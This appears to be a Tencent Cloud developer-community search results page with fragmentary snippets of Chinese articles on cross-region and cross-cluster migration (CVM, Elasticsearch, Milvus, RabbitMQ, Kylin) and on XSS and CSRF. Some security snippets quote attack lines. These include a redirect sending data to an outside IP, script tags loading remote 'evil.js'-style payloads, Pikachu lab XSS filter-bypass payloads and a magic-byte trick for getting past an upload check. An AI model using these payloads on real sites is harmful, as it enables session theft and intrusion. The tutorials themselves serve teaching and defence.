- 综合排序
- 最热优先
- 最新优先
- 来自专栏cvm功能
cvm跨地域迁移
迁移方案: 一、迁移系统盘数据(此操作方法仅限于系统盘不大于50G的) 1、首先将要迁移的云主机制作自定义镜像,备份系统盘数据。 image.png image.png 2、将制作好的自定义镜像跨地域复制到需要迁移到的地域 image.png image.png 3、在需要迁移的地域找到刚复制过来的自定义镜像,只用该镜像创建新的云主机 image.png 4、如果没有数据盘,此时创建出来的云主机已经将旧的云主机的数据迁移完成。可以登录云主机验证数据是否完整。如果有数据盘是云硬盘,继续参考如下步骤迁移数据盘数据。 如果有数据盘是本地盘,需要自行通过ftp等方式迁移。 二、迁移数据盘数据 1、给数据盘做快照备份数据 image.png image.png 2、将制作好的快照跨地域复制到需要迁移的地域。 image.png image.png 3、在要迁移的地域找到刚刚跨地域复制的快照,使用该快照新建云硬盘,可用区选择之前创建新云主机的可用区。
3.3K22发布于 2019-01-24 - 来自专栏红日安全
Web安全Day2 - XSS跨站实战攻防
1.XSS漏洞概述 1.1 漏洞简介 跨站脚本攻击—XSS(Cross Site Script),是指攻击者通过在Web页面中写入恶意脚本,造成用户在浏览页面时,控制用户浏览器进行操作的攻击方式。 new Date(); t2=d2.getTime(); location.href="http://123.207.99.17/id1? XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL xss_and_mysql_file_i386.iso 打开VMware经典模式挂上镜像一直下一步,选择桥接模式就能自动分配一个IP地址 安装成功 3.3 Vulnhub 漏洞介绍 本练习说明如何使用跨站点脚本漏洞来访问管理员的
1.8K40发布于 2020-02-18 - 来自专栏腾讯云Elasticsearch Service
Elasticsearch跨集群数据迁移之离线迁移
跨集群数据迁移 用户在腾讯云上自建的ES集群或者在其它云厂商购买的ES集群,如果要迁移至腾讯云ES,用户可以根据自己的业务需要选择适合自己的迁移方案。 :9200 snapshot 适用场景 适用数据量大的场景 使用方式 snapshot api是Elasticsearch用于对数据进行备份和恢复的一组api接口,可以通过snapshot api进行跨集群的数据迁移 配置reindex.remote.whitelist参数 需要在目标ES集群中配置该参数,指明能够reindex的远程集群的白名单 2 . 上述配置文件将源ES集群的所有索引同步到目标集群中,当然可以设置只同步指定的索引,logstash的更多功能可查阅logstash官方文档 总结 elasticsearch-dump和logstash做跨集群数据迁移时 因此elasticsearch-dump和logstash迁移方式更适合于源ES集群和目标ES集群处于同一网络的情况下进行迁移,而需要跨云厂商的迁移,比如从阿里云ES集群迁移至腾讯云ES集群,可以选择使用
26.5K105发布于 2018-06-08 - 来自专栏Elasticsearch实验室
Elasticsearch跨集群数据迁移之在线迁移
本方案旨在通过集群融合的方式帮助用户进行在线迁移,尽量降低迁移过程对业务的影响,同时尽可能提高迁移的自动化程度。 二、整体思路 假定用户原有集群为A,迁移后新集群为B。 具体迁移操作步骤如下: 1、融合前,对 新建集群 需要确认没有打开权限,如果有打开,需要关闭。 2、调用 cluster update 接口对 新建集群 进行集群升级,升级到 60403.20190426.eb1002e8,并更改集群名字。 _name" : "{用户节点名1, 用户节点名2...}" } }' 4、对 新建集群 调用 cluster update 接口进行升级, 修改 discovery.zen.ping.unicast.hosts _name" : "{用户节点名1, 用户节点名2...}" } }' 6、数据搬迁完成后,剔除 用户集群 的节点,下线用户集群。
3.2K31发布于 2019-11-28 - 来自专栏腾讯云Elasticsearch Service
Elasticsearch跨集群数据迁移之在线迁移
本方案旨在通过集群融合的方式帮助用户进行在线迁移,尽量降低迁移过程对业务的影响,同时尽可能提高迁移的自动化程度。 二、整体思路 假定用户原有集群为A,迁移后新集群为B。 具体迁移操作步骤如下: 1、融合前,对 新建集群 需要确认没有打开权限,如果有打开,需要关闭。 2、调用 cluster update 接口对 新建集群 进行集群升级,升级到 60403.20190426.eb1002e8,并更改集群名字。 _name" : "{用户节点名1, 用户节点名2...}" } }' 4、对 新建集群 调用 cluster update 接口进行升级, 修改 discovery.zen.ping.unicast.hosts _name" : "{用户节点名1, 用户节点名2...}" } }' 6、数据搬迁完成后,剔除 用户集群 的节点,下线用户集群。
3.4K21发布于 2019-11-28 - 来自专栏Reinvent Data Science
Milvus跨集群数据迁移
注意:此方案为非实时同步方案,但借助 MinIO 客户端的数据同步功能,应该也是可以做到实时同步迁移。 制作 milvus-backup 镜像 注意:如果是在两个单机版的 milvus 之间迁移数据,是不需要 milvus-backup 镜像的,又或者,如果 k8s 集群部署了 milvus, minio 注意一下,由于需要在两个集群间迁移,因此创建工作负载的时候挂载一个共享存储(/backup),方便迁移 MinIO 备份后的数据。 03. 个配置需要注意: minio.backupBucketName minio.backupRootPath 这 2 个是备份文件存放的目录,后续我们需要使用 MinIO 客户端将文件拷贝到本地存储中。 恢复数据到新的集群中 进入新的集群(B)执行步骤 2和步骤 3,在步骤 3 中将 backup.yaml 中的配置修改成集群 B 的链接信息。
1.1K10编辑于 2024-06-14 - 来自专栏房东的猫
Elasticsearch跨集群数据迁移
ES官方在6.5版本之后的CCR(跨集群复制)功能,把旧集群作为Leader, 新集群作为Follower, 旧集群不停止读写,新集群从旧集群中follow新写入的数据;另一方面使用第三方工具把存量的旧集群中的数据迁移到新集群中 match": { "title": "elasticsearch" } } }, "dest": { "index": "test2" } } snapshot 适用场景 适用数据量大的场景 使用方式 snapshot api是Elasticsearch用于对数据进行备份和恢复的一组api接口,可以通过snapshot api进行跨集群的数据迁移 image.png 使用中间件进行同步双写的优点是: 写入过程中丢失数据风险较低 可以保证新旧集群的数据一致性 总结 elasticsearch-dump和logstash做跨集群数据迁移时,都要求用于执行迁移任务的机器可以同时访问到两个集群 因此elasticsearch-dump和logstash迁移方式更适合于源ES集群和目标ES集群处于同一网络的情况下进行迁移,而需要跨云厂商的迁移,比如从阿里云ES集群迁移至腾讯云ES集群,可以选择使用
2K32发布于 2021-01-20 - 来自专栏mySoul
js跨站脚本
xss 跨站脚本,称为xss这个术语用来表示一类的安全问题,指攻击者向目标web站点注入html标签或者脚本。 server for chrome 完成了本地静态服务器的搭建,使用host文件,强制修改home.abc.com 以及 abc.com 到 127.0.0.1 完成域名的绑定,因为js脚本不能本地运行,因为有跨域的限制 %3Cscript%20src=%E2%80%9Chttps://1.com/evil.js%E2%80%9D%3E%3C/script%3E 这样就完成了一次脚本的注入。
3.8K40发布于 2018-08-03 - 来自专栏cvm功能
cvm跨可用区迁移
前言:cvm无法直接迁移的,以下给出的方式是备份数据重新购买云主机,然后销毁原有的云主机。所以操作前首先要确认自己的云主机是可以退还的,并且认可退还金额的。 迁移方案: 一、迁移系统盘数据 1、将需要迁移的云主机先制作下镜像,将系统盘整体备份下 image.png image.png image.png 2、使用刚刚制作好的镜像创建实例,此时创建出来的云主机 image.png image.png 4、云主机购买完成后,至此,系统盘数据迁移完毕。只有系统盘的可以登录新的云主机确认数据是否正常。有数据盘的还需要再迁移数据盘数据。 image.png 二、迁移数据盘数据 1、给数据盘制作快照备份数据盘数据。 image.png image.png 2、找到创建的数据盘快照,使用快照新建云硬盘,地区选择新购的云主机的可用区。 image.png image.png 4、登录云主机,再系统内部使用mount命令将数据盘挂载到原数据盘的挂载目录 image.png 至此系统盘和数据盘数据均迁移完成,确认数据是否完整,业务是否正常
3.1K31发布于 2019-01-16 - 来自专栏洛米唯熊
跨站请求伪造
CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 2、请求中也多了一个字段__RequestVerificationToken。 ? 原来要加这么个字段,我也加一个不就可以了! ? 啊!为什么还是不行...逼我放大招,研究源码去! ? 噢! 'amount': amount }; return $.ajax({ url: '@Url.Action("Transfer2" 2、为什么只处理POST请求? 我开发的时候有一个原则,查询都用GET,操作用POST,而对于查询的请求没有必要做CSRF的处理。大家可以按自己的需要去安排!
1.5K20发布于 2019-07-25 - 来自专栏云计算-私有云
XenDesktop 策略跨站点迁移
最近做了一次XenDesktop的整体升级,期间考虑到原有架构的不稳定性,采取了新建XD Site方式,将原有桌面全部迁移到新Site后,原有配置的诸多XD策略也需要迁移过来,经过查询,Citrix 提供了相应的 PowerShell命令来方便管理员的迁移。 整个过程分为2部分 1. 导入Citrix管理Module #Export-BrokerDesktopPolicy | Out-File -FilePath c:\xdpolicybak.txt \\导出策略到本地C盘 2.
88320发布于 2019-02-28 - 来自专栏Khan安全团队
PHP Laravel 8.70.1 - 跨站脚本(XSS)到跨站请求伪造(CSRF)
hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b 重现步骤: 1- 使用 HxD 工具并在文件开头添加 FF D8 FF E0 2-
1.1K20编辑于 2021-12-17 - 来自专栏小饼云计算
混合多云迁移, 应用无缝迁移跨云多活
随着混合多云架构的常态化, 多云迁移将越来越普遍。 多云迁移往往不是简单的跨云搬迁, 更多需要和业 务应用重构以及多云容灾体系相结合。 传统业务应用的多云迁移传统业务的跨云迁移主要包含应用迁移与数据迁移, 因为跨云的异构性, 迁移前需进行充分的调研并制定 完备的实施方案。 现阶段也有如整机迁移之类方便使用的迁移 工具。 数据层面则利用 DTS 工具实现数据的结构迁移、 全量迁移、 增量迁移及异构数据库迁移。 但是混合多云下云原生的迁移, 常常不会是简单的从一个云的集群迁移到另一个集群。 更多的是和多云容 灾及流量调度结合,实现跨云多活体系。 这种架构体系,可以实现更细粒度的业务拆分和迁移后的灰度调度。 通过这种方式, 可以屏蔽底层异构资源, 实现跨云跨集群的统一 PaaS 层资源构建, 同时打造可靠的数据同步管道, 降低应用迁移成本, 实现应用在多云环境的实时、 无缝、 可靠迁移。
83730编辑于 2023-08-20 - 来自专栏写代码和思考
XSS跨站请求攻击
一、前言 XSS 即 Cross Site Script,跨站脚本攻击;缩写应该是 CSS,但为了和 CSS(Cascading Style Sheet,层叠样式表) 有所区分,因而改叫 XSS 也就通过利用网站漏洞 2) 于是攻击者构建出一个 URL,然后诱导用户去点击: http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script
38010编辑于 2024-03-01 - 来自专栏PHPer技术栈
CSRFXSRF (跨站请求伪造)
攻击者通过跨站请求,以合法的用户身份进行非法操作 攻击原理 1. 主要归结于浏览器同源策略限制级别的问题。 2. 但是也有例外,如 'img' 标签,"script" 标签,"iframe" 标签等的链接会自动加载,更重要的是,表单提交也是可以跨域。 防御措施 表单提交请求 CSRF 攻击防御 因为表单提交是可以跨域的,所以表单提交的 CRSF 防御已经成为站点的标配了。原理也很简单,因为表单的提交都要分为两个阶段,表单渲染和表单提交。 XSS (Cross-Site Scripting, 跨站脚本攻击) 攻击原理 恶意代码未经过滤,与网站的正常代码混在一起,浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 2.
3.5K30发布于 2019-10-09 - 来自专栏开源部署
RabbitMQ集群跨网段消息迁移
故要迁移 整个网络拓扑图如下 注意: 若对于跨VPC网络 1. 确保各主机网络互通 2. Listing queues for vhost / ... queue_test_3 100000 queue_test_2 200 queue_test_1 10000 迁移方案 迁移步骤 1. 方案2【可行】 若RabbitMQ采用镜像队列,将集群A中的消息数据迁移到集群B中, 集群A中的node171、node172采用镜像队列 构建集群A的镜像队列环境 1.首先集群A中的node172加入集群中 开始集群A中的镜像队列迁移 1.停止所有消息的生产者和消费者相关应用服务 2.停止集群A中的所有机器,并备份原始数据 【node171、node172】都要操作 Node172执行如下: [root@
1.8K10编辑于 2022-07-27 - 来自专栏大数据技术博文
Kylin云端跨集群迁移实践
“ 本文介绍在云端kylin数据迁移的实现方案以及在迁移过程中的遇到哪些问题,并给出了问题解决方案.本次迁移中涉及到的hbase cube表1600+,model数量80+,project 10+” 01 — 目录 迁移前准备 Kylin迁移概述与方案制定 不同方案的实现与问题 迁移前的前置依赖 迁移过程中的问题以及解决方法 迁移完成后的checklist都有哪些? 元数据迁移完成之后,接下来需要迁移kylin的cube 预计算的数据. org.apache.hadoop.hbase.coprocessor.MultiRowMutationEndpoint] org.apache.kylin.storage.hbase.cube.v2. Caused by: org.apache.hadoop.hbase.TableExistsException: KYLIN_XXXX 解决方法: 1、list查看hbase中是否有相应表,有则删除 2、
1.2K30编辑于 2022-04-18 - 来自专栏FEWY
跨站脚本攻击—XSS
本文链接:https://blog.csdn.net/FE_dev/article/details/100876661 XSS 介绍 XSS 是跨站脚本攻击(Cross Site Scripting) 传播跨站脚本蠕虫,网页挂马等。 结合其他漏洞,如 CSRF 漏洞,实施进一步的攻击。 它是最危险的一种跨站脚本,比反射性 XSS 和 DOM 型 XSS 都更有隐蔽性,因为它不需要用户手动触发。任何允许用户存储数据的 Web 程序都可能存在存储型 XSS 漏洞。 如果检测到跨站脚本攻击,浏览器将清除页面(删除不安全的部分)。 X-XSS-Protection: 1; mode=block 启用XSS过滤。 如果检测到跨站脚本攻击,浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。
2.1K10发布于 2019-09-18 - 来自专栏FEWY
跨站请求伪造—CSRF
CSRF 介绍 CSRF,是跨站请求伪造(Cross Site Request Forgery)的缩写,是一种劫持受信任用户向服务器发送非预期请求的攻击方式。 Strict Lax None Strict Strict最为严格,完全禁止第三方 Cookie,跨站点时,任何情况下都不会发送 Cookie。 但是 Origin 在以下两种情况下并不存在: 1、 IE11同源策略: IE 11 不会在跨站 CORS 请求上添加 Origin 头,Referer 头将仍然是唯一的标识。 2.IE6、7下使用window.open,也会缺失 Referer。 3.HTTPS 页面跳转到 HTTP 页面,所有浏览器 Referer 都丢失。 2、前端发请求时携带这个 Token 对于 GET 请求,Token 将附在请求地址之后,这样 URL 就变成 http://url?token=tokenvalue。
1.8K20发布于 2019-11-27 - 来自专栏白菜博客
【Pikachu】XSS(跨站脚本)
一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位 message=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&submit=submit 通过分析发现,Payload直接拼接到了URL上,只不过浏览器对其进行了 ,大小写,比如: aLeRT(111)< /sCRIpt> 2 ,拼凑: <scri 3 ,使用注释进行干扰: <scri
XSS绕过-过滤-编码 后台过滤了特殊字符,比如< script>标签 例子2: HTML实体编码绕过 image.png XSS过滤绕过实验演示: 首先,按照测试流程输入特殊字符 <script>;()111 发现 <script>标签被K了,尝试大小写混合绕过; payload class='notice'>你的输入已经被记录:"; //输入的内容被处理后输出到了input标签的value属性里面,试试:' onclick='alert(111)' // $html2.2.5K20编辑于 2022-03-17
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号